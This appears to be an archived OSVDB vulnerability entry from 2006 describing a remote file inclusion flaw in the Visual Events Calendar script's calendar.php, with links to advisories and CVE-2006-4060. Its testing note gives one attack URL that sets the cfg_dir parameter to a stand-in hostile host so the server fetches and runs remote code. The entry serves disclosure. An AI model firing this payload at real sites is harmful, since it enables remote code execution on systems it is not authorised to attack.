Visual Events Calendar calendar.php cfg_dir Variable Remote File Inclusion

2006-08-07T10:05:09
ID OSVDB:27841
Type osvdb
Reporter OSVDB
Modified 2006-08-07T10:05:09

Description

Manual Testing Notes

http://[target]/[path]/calendar.php?cfg_dir=http://evil_scripts?

References:

Vendor URL: http://www.web-scripts.biz/calendar.php
Security Tracker: 1016646
Secunia Advisory ID: 21391
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0127.html
Generic Exploit URL: http://www.milw0rm.com/exploits/2141
CVE-2006-4060
Bugtraq ID: 19395